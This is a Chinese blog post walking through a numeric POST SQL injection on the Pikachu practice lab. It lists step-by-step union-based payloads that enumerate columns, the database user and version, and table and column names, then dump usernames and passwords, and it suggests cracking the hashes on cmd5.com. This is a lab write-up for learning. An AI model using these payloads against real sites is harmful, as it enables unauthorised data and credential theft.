首页 > 数据库技术 > 详细

不使用burp suite-SQL注入-union注入(联合查询)-pikachu之数字型注入(post)

时间:2020-02-13 10:04:28      阅读:100      评论:0      收藏:0      [点我收藏+]

pikachu之数字型注入(post)

技术分享图片

 

 

 技术分享图片

 

 

 

下面输入内容均为Post data内容

id=3‘&submit=%E6%9F%A5%E8%AF%A2   ------报错

 技术分享图片

id=3 and 1=1&submit=%E6%9F%A5%E8%AF%A2   ---正常

 技术分享图片

id=3 and 1=2&submit=%E6%9F%A5%E8%AF%A2   ----报错

 技术分享图片

id=3 order by 3&submit=%E6%9F%A5%E8%AF%A2   ---报错

 技术分享图片

id=3 order by 2&submit=%E6%9F%A5%E8%AF%A2  --正常   证明可以查找的是两个字段

 技术分享图片

id=-3 union select 1,2&submit=%E6%9F%A5%E8%AF%A2    -----   负3表示隐藏

 技术分享图片

id=-3 union select user(),database()&submit=%E6%9F%A5%E8%AF%A2  ---获取当前用户和数据库名称

 技术分享图片

id=-3 union select version(),database()&submit=%E6%9F%A5%E8%AF%A2    --获取数据库版本

 技术分享图片

id=1 and 1=2 union select group_concat(‘<br/>‘,table_name),database() from information_schema.tables where table_schema=database()  &submit=%E6%9F%A5%E8%AF%A2        ----获取表名

 技术分享图片

id=1 and 1=2 union select group_concat(‘<br/>‘,column_name),database() from information_schema.columns where table_schema=database() and table_name=‘users‘ &submit=%E6%9F%A5%E8%AF%A2        ---获取字段(以表users举例)

 技术分享图片

id=1 and 1=2 union select group_concat(‘<br/>‘,username),group_concat(‘<br/>‘,password) from users&submit=%E6%9F%A5%E8%AF%A2      ---获取字段username,password

 技术分享图片

https://www.cmd5.com/    把密码复制到这个网站进行解密可以得到明文

 

不使用burp suite-SQL注入-union注入(联合查询)-pikachu之数字型注入(post)

原文:https://www.cnblogs.com/mrlpl/p/12302034.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!